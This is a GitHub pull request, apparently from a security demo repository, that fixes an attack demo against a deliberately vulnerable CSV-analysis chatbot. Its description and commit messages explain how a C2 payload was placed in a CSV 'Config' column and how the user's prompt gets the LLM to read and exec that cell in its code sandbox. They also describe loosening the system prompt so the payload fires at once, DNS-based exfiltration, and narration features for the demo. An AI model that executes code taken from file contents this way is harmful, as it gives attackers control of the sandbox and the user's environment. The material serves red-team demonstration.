Skip to content

Fix payload delivery and chatbot reliability for demo#9

Merged
kmcquade merged 2 commits intomainfrom
demo-narration
Mar 22, 2026
Merged

Fix payload delivery and chatbot reliability for demo#9
kmcquade merged 2 commits intomainfrom
demo-narration

Conversation

@kmcquade
Copy link
Copy Markdown
Collaborator

Summary

The demo was completely broken — three compounding issues prevented the C2 payload from executing in the Code Interpreter sandbox:

  • Shared boto3 sessions across BackgroundTask threads caused API calls to hang after ~10 minutes. The AgentCoreService singleton shared boto3 clients across concurrent threads, corrupting the underlying SSL connection pool. Fixed by creating a fresh boto3.session.Session() per analyze_csv() call.

  • LLM corrupting the base64 payload — Llama 4 Scout consistently truncated or mangled the ~1800 char base64 string when reproducing it in generated code. Redesigned payload delivery: CSV now has a "Config" column with the exec line, the file is written to disk (not inlined in the LLM prompt), and the user's message directs the LLM to csv.reader the file and exec the cell. Zero base64 reproduction needed.

  • Overly prescriptive system prompt told the LLM to "read the file to understand its structure" before acting, causing it to explore the data for multiple iterations instead of following the user's instructions. Simplified to "Follow the user's instructions" so the payload fires on iteration 1.

All three fixes were required — any one alone was insufficient. Verified end-to-end: whoami returns genesis1ptools from the sandbox.

Changes

  • victim-infra/chatbot/app/services/agentcore.py — Per-request boto3 sessions, detailed timing logs, simplified system prompt, MAX_TOOL_ITERATIONS reduced to 3
  • attacker-infra/c2/core/payload_generator.py — Simplified CSV format with Config column, removed old injection styles
  • attacker-infra/c2/cli/generate.py — Updated CLI to print the suggested prompt for web UI upload
  • attacker-infra/c2/core/attack_client.py — Use new generator API
  • docs/DEMO_GUIDE.md — New step-by-step demo guide for the web UI workflow
  • README.md — Updated quick start section

Test plan

  • Verified make generate-csv produces clean CSV with payload in Config column
  • Verified upload via web UI with suggested prompt triggers LLM to exec the Config cell
  • Verified C2 payload calls home (DNS queries reach C2 server within seconds)
  • Verified whoami command returns genesis1ptools via DNS exfiltration
  • Verified per-request boto3 sessions eliminate the hanging issue

- Add --narrate flag to `c2 exploit` for step-by-step demo explanations
  using [~] prefix lines that explain the attack chain to an audience
- Auto-wait for payload to call home after exploit delivery (default on,
  --no-wait to disable) with rolling progress dots and elapsed time
- Add --wait-timeout option (default 60s) for the session wait
- Add progress indicator to `c2 attach` command-wait loop showing
  elapsed time and rolling dots instead of silent 30s hang
- Enhance `status` command in attach shell to show session liveness
  from list_sessions() (last seen, active/terminated)
- Convert print() to click.echo() in attack_client.py and
  click.echo(err=True) in session_manager.py for consistent output
- Add `make demo` target for narrated exploit + auto-attach flow
The demo was broken by three compounding issues discovered during
debugging:

1. **Shared boto3 sessions across background threads** — The chatbot's
   AgentCoreService was a singleton sharing boto3 clients across
   FastAPI BackgroundTask threads. Concurrent requests corrupted the
   underlying SSL connection pool, causing API calls to hang
   indefinitely after the first request completed. Fixed by creating
   a fresh boto3.session.Session() per analyze_csv() call.

2. **LLM corrupting base64 payloads** — The old injection strategy
   embedded the full base64 C2 payload (~1800 chars) in a CSV cell and
   relied on the LLM to faithfully reproduce it in generated code.
   Llama 4 Scout consistently truncated or mangled the base64 string,
   causing decode errors. Redesigned the payload delivery: the CSV now
   has a simple "Config" column with the exec line, the CSV is written
   to disk (not inlined in the prompt), and the user's message directs
   the LLM to read the cell from the file via csv.reader and exec it.
   The LLM only generates ~5 lines of csv.reader code — zero base64
   reproduction needed.

3. **Overly prescriptive system prompt** — The chatbot prompt told the
   LLM to "read the file to understand its structure, then perform
   analysis", which made it explore the data for several iterations
   before following user instructions. Simplified to "Follow the
   user's instructions" so the LLM executes what's asked on the first
   tool-use iteration.

Also adds:
- Per-call timing logs for every boto3 API call (>> before, << after)
- docs/DEMO_GUIDE.md with step-by-step web UI demo instructions
- Updated README quick start for the web UI workflow
- Reduced MAX_TOOL_ITERATIONS from 10 to 3
@kmcquade kmcquade requested a review from a team as a code owner March 22, 2026 22:34
@kmcquade kmcquade merged commit b322fcf into main Mar 22, 2026
4 checks passed
@kmcquade kmcquade deleted the demo-narration branch March 22, 2026 22:36
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Development

Successfully merging this pull request may close these issues.

1 participant